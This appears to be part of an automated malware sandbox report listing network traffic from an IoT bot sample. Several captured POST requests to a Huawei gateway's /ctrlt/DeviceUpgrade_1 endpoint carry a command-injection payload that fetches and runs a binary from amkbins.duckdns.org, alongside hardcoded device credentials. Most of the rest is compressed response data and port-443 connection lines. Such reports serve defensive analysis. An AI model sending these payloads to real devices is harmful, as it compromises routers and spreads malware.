            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 452Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 2e 61 6d 6b 20 2d 72 20 2f 68 75 61 77 65 69 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 61 6d 6b 3b 20 73 68 20 2f 74 6d 70 2f 2e 61 6d 6b 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/.amk -r /huawei; /bin/busybox chmod 777 /tmp/.amk; sh /tmp/.amk)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 23 Oct 2022 15:56:58 GMTServer: Apache/2Link: <http://zhuyangdao.com/wp-json/>; rel="https://api.w.org/"CpuTime: 188Vary: Accept-Encoding,User-AgentContent-Encoding: gzipContent-Length: 3529Keep-Alive: timeout=2, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 5a 6d 73 d3 c6 16 fe 4c 7e 85 22 3a b1 35 58 92 ed 40 42 13 2b 0c a5 74 a6 33 bd bd 77 a0 cc fd 40 28 b3 b1 36 b6 40 96 74 a5 75 12 93 64 26 40 c2 4b 4b 80 16 4a b9 10 08 2f 2d e5 a5 0d d0 70 21 24 a4 99 b9 3f a5 d7 92 cd a7 fe 85 7b 76 57 b6 65 c7 09 b4 97 7e bb a5 24 d2 ee d9 73 ce 9e f3 ec 79 59 91 e9 d4 ed 2c 29 39 58 c8 93 82 39 d0 91 a1 bf 04 13 59 39 4d 3c 96 97 f7 7c 2a d2 31 8c f4 81 8e 2d 99 02 26 48 c8 e6 91 eb 61 a2 89 07 3e fb 48 de 29 0a 6a 7d c6 42 05 ac 89 23 06 1e 75 6c 97 88 42 d6 b6 08 b6 80 72 d4 d0 49 5e d3 f1 88 91 c5 32 7b 49 08 86 65 10 03 99 b2 97 45 26 d6 52 21 1f d3 b0 8e 0a 2e 36 35 d1 71 ed 61 c3 c4 a2 90 77 f1 b0 26 e6 09 71 bc 3e 55 cd 15 9c 9c 62 bb 39 75 6c d8 52 53 b5 65 c4 20 26 1e f8 75 6a 4e 35 2c 1d 8f a9 bf 4e dd a8 5c 9b 0e 2e ce 55 9e dd a9 ac 5c 0a 6e ce 09 5d 5b 77 a6 53 a9 7e 21 98 7b ea cf ac bc 3e 7e 29 a3 f2 55 1d 0d a1 31 dd f2 64 07 e4 61 92 cd c7 b8 e4 98 aa 1e cb 17 4b 60 10 1d d9 4a d6 2e c4 a8 c8 37 ae f1 94 51 aa 66 0b b1 88 4c 82 5d 0b 11 d8 17 35 3a 0c 38 8e 69 64 11 31 6c 4b 75 3d 6f db 58 c1 84 29 aa 98 26 d6 55 15 ba 5c f4 8f a2 dd 2f 7c 84 b1 1e b5 48 5f ab 72 ea 30 a3 78 a7 42 ab 8f a7 ab 0b cb 6f 16 0d 7f 0b e0 6e ef cf d0 61 33 d7 be 59 33 0f 23 37 9b 57 43 0e 54 3d 2a 32 ad 72 f4 6c c9 78 59 d7 70 48 a8 18 c1 63 44 3d 82 46 10 1f 15 29 c5 96 51 58 6a 8f 2a 87 47 1d 5c b0 8f 18 fb 31 21 86 95 f3 04 4d 18 17 87 90 87 0f b8 a6 d8 17 82 74 50 1d ac b9 7f 50 35 0a 28 87 bd 41 30 8e 8b 07 55 b6 78 50 4d a5 95 a4 92 94 53 83 6a 6f 7a ac 37 3d a8 8a 09 11 a4 02 07 c5 b1 72 f0 e2 8d e4 fe 28 47 58 ca f8 c1 ef bd 9c 25 3c d1 77 bb e8 66 b1 d8 37 2e c2 b1 04 bb b3 85 a1 04 26 a0 d9 66 83 ea a8 23 1b 56 d6 2c ea 54 d8 11 8f 0d b0 45 32 38 14 c3 9e 95 82 61 29 47 bc 5d 23 d8 d5 76 28 69 25 d5 2b 4e 4e f6 53 6b 75 0e 17 ad 2c f5 6c 1c 27 50 82 48 e3 23 c8 15 ac 84 9b b0 13 86 86 94 ac 8b 41 fe 5e 13 53 b8 c4 c5 2c b2 c0 d8 a2 94 70 34 43 c9 61 b2 87 86 8d 31 d2 d5 15 7d 8b 8b 69 5d 94 fa 6b 8c 05 0f 58 87 8c 91 b6 9f b8 e0 0d 65 d8 b5 0b 7b 20 3a ed b1 75 dc ef 28 59 d0 d2 dd 87 b3 24 9e 4c 24 13 86 c2 03 8f a1 e4 b1 91 cb 13 10 a7 40 80 31 3f a3 cc 91 42 e1 58 8a 93 bc e1 25 b0 04 e4 49 a9 1f 83 3a c4 fe 10 11 74 60 df 27 71 a9 df c5 a4 e8 5a c2 1f 67 4c 38 e3 04 d6 b4 66 d6 93 f5 6d 65 e3 98 6f 8a ac b7 53 88 47 a9 9f 28 9e 9b d5 60 ff 8a 0e 61 c7 d5 88 d2 1e b9 09 44 0d 18 ae f7 3e 28 7d 86 72 9f 42 88 8e 8b 34 9e 8b d2 c1 e4 21 aa 1d b6 f4 3d 79 c3 d4 e3 04 f4 b0 dd b8 ad ed 76 5d 54 8a 8b c3 26 a2 c0 e1 40 91 40 9a 57 74 68 60 f7 b4 71 0c 3e 2f c1 9e ac 5c 5f 67 32 d1 78 db 3b 96 c5 0e f9 08 16 c2 f8 64 c2 d5 92 fd 6e c6 56 4c 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 23 Oct 2022 15:57:11 GMTServer: Apache/2.2.22 (Debian)X-Powered-By: PHP/5.4.36-0+deb7u3Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 20Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 23 Oct 2022 15:56:41 GMTServer: ApacheX-Powered-By: PHP/5.3.10-1ubuntu3.26Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 1716Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 bd 58 5b 73 da 46 14 7e c6 bf e2 44 9d 8e 7b 41 08 81 4d 30 06 77 26 be 4c d2 49 5a 4f 43 d2 cb 0b b3 48 6b b4 b6 d0 aa d2 62 0c 69 5e fa d2 df d0 e9 5f c9 63 fc bf 7a f6 22 90 64 04 6e 32 53 cf c8 c0 ee 9e b3 df f9 f6 5c f6 a8 ff e4 ec c7 d3 e1 af 97 e7 10 88 69 08 97 6f 9e bd 7c 71 0a 96 ed 38 3f b7 4f 1d e7 6c 78 06 bf 3c 1f be 7a 09 6e a3 09 c3 84 44 29 13 8c 47 24 74 9c f3 1f 2c b0 02 21 e2 9e e3 cc e7 f3 c6 bc dd e0 c9 c4 19 fe e4 dc 49 5d ae 14 36 5f 6d 91 93 6c f8 c2 b7 4e f6 fa 6a c3 bb 69 18 a5 83 0d 6a dc a3 a3 23 2d 8d 6b 01 fa 01 25 be fc 82 5f a7 54 10 90 12 36 fd 7d c6 6e 07 d6 29 8f 04 8d 84 3d 5c c4 d4 02 4f ff 1a 58 82 de 09 47 6a 38 06 2f 20 49 4a c5 e0 cd f0 c2 ee 5a e0 18 4d 82 89 90 9e 3c e7 a9 60 d1 a4 0e af 69 32 a7 c9 a2 0e 97 dc 5b e2 1e 7f c0 90 7a c1 2b ea 33 d2 77 f4 5a 2d 97 8a 45 48 41 e0 76 66 17 2f 4d 2d 98 ca 85 03 2b f5 12 4a 23 85 fa 1b 78 a7 04 a6 24 99 b0 a8 07 cd f8 2e ff 1c ab c9 98 f8 3e 6e bf 71 f6 fd 1e fe 1b 73 1f 31 29 ba de 15 25 ba 72 69 7b fd 68 85 63 e2 dd 4c 12 3e 8b 7c db e3 21 4f 7a f0 c5 59 f7 ec d9 79 4b 4f 5f 21 3f f6 15 99 b2 70 d1 83 b7 34 f1 49 44 ea 90 e2 01 d9 29 4d d8 55 6e 55 ca 96 b4 07 ae 1b 0b 3d 28 6d b5 49 c8 26 68 8b 87 1c d3 c4 80 6c 84 2c ba 19 45 3c 99 92 10 48 4f fe aa 97 07 6f 19 7a 00 f5 d1 86 9a d2 e3 53 8f 27 44 fa 44 0f 22 1e d1 e3 bd 5a 06 b7 a9 fe 8e f7 1e 6a 0e f8 2d 4d 36 aa 40 73 69 82 8b 51 cf 9e a2 cd 67 b7 8d 29 61 d1 28 26 13 9a 31 c7 b5 17 f6 20 a1 21 0a de 52 6d 98 cf d2 38 24 c8 87 20 e3 d0 8c cd 99 2f 02 c9 f1 ea a4 f4 31 da 63 2e 04 9f 22 2f e5 89 90 5e 89 1e 90 99 e0 85 e1 84 4d 82 c2 f8 b6 13 97 c7 9d a0 25 b6 d9 be 55 1a ce 28 6a b9 ad a7 ed 6e 61 4a 79 65 0f 52 1e 32 bf d2 13 2e d4 df 8e e3 d4 e4 49 de 46 32 ee 14 e3 52 20 a0 da 14 b7 b3 42 6b 60 ba cd e6 97 78 80 3b 2c 7b 08 a7 7b 7e 74 fa 0c 1d b3 96 c7 22 79 ac 44 92 c6 24 7a 4c 58 e5 1d f8 40 82 5b 0d ce 8d 15 63 1e fa 95 db b0 e9 c4 ec a2 d9 ed 3d 0c 4d 00 23 27 78 3c a2 21 9d 22 85 e5 08 6d 1f ee c2 e6 6e c1 56 db 71 42 ca 5b 47 fc 6a 64 72 5e 6a b6 f7 42 4a 92 35 8f c8 14 ba 61 e6 50 65 7f ee e5 33 c8 d6 2c 52 e5 3b 0f ce eb 01 ae 11 46 fe b4 0a 5c c1 85 f2 b8 0e 1e e9 44 79 5c e5 14 f2 a9 58 49 c9 c7 3a 39 2c 9d 5c 72 96 2a 8c e4 28 a5 9e 4c 2e 25 49 e9 01 b9 e7 f3 d9 2d 6d 37 92 8b cb 7e d7 92 38 bb f8 64 5f 2a b7 ed 74 0e 0f c7 e3 6a f2 0a 71 24 f5 d4 64 92 b5 b3 54 d0 a2 d3 52 34 6c 82 37 a2 d1 a7 23 ec d2 23 6f dc fa 7c 84 db e8 8b 13 5a 3a b6 ae 39 ec ee c6 5a dd 35 33 dd 02 f6 42 e6 76 4b c3 26 3d fb 58 3d a8 5f 98 d9 64 d4 26 07 39 bc e8 5c 3c cd db ac 35 32 81 9e e2 3d c2 c6 82 85 ab 32 b6 c3 9b b5 ec 2c ac 57 4f 86 ac 7c b8 07 86 1a f9 e9 96 37 c8 64 0b a5 65 9d 31 75 80 65 9f 3b 2b 47 de 2b f2
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50732
            Source: unknownNetwork traffic detected: HTTP traffic on port 46746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45388
            Source: unknownNetwork traffic detected: HTTP traffic on port 46104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40248 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45380
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58216
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59548
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38602
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36428
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59550
            Source: unknownNetwork traffic detected: HTTP traffic on port 36944 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59380 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55192
            Source: unknownNetwork traffic detected: HTTP traffic on port 55624 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34476 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50744
            Source: unknownNetwork traffic detected: HTTP traffic on port 52862 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33666 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59560
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56054
            Source: unknownNetwork traffic detected: HTTP traffic on port 60082 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48874
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47544
            Source: unknownNetwork traffic detected: HTTP traffic on port 43182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43182
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50758
            Source: unknownNetwork traffic detected: HTTP traffic on port 36956 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36670 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36890
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34228
            Source: unknownNetwork traffic detected: HTTP traffic on port 45764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36412
            Source: unknownNetwork traffic detected: HTTP traffic on port 52174 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60554
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57398
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35562
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34230
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33382
            Source: unknownNetwork traffic detected: HTTP traffic on port 59036 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47534
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45358
            Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48860
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51618
            Source: unknownNetwork traffic detected: HTTP traffic on port 41710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34216
            Source: unknownNetwork traffic detected: HTTP traffic on port 60782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38462 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35544
            Source: unknownNetwork traffic detected: HTTP traffic on port 58832 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59494 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59102
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56078
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39900
            Source: unknownNetwork traffic detected: HTTP traffic on port 42556 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55980 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48856
            Source: unknownNetwork traffic detected: HTTP traffic on port 47466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48454
            Source: unknownNetwork traffic detected: HTTP traffic on port 45720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53902 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37322
            Source: unknownNetwork traffic detected: HTTP traffic on port 44876 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56482
            Source: unknownNetwork traffic detected: HTTP traffic on port 53582 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60976
            Source: unknownNetwork traffic detected: HTTP traffic on port 41598 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54858 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42568 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36338 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44348 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44084
            Source: unknownNetwork traffic detected: HTTP traffic on port 43330 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40146 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58674
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35134
            Source: unknownNetwork traffic detected: HTTP traffic on port 32938 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55890 -> 443
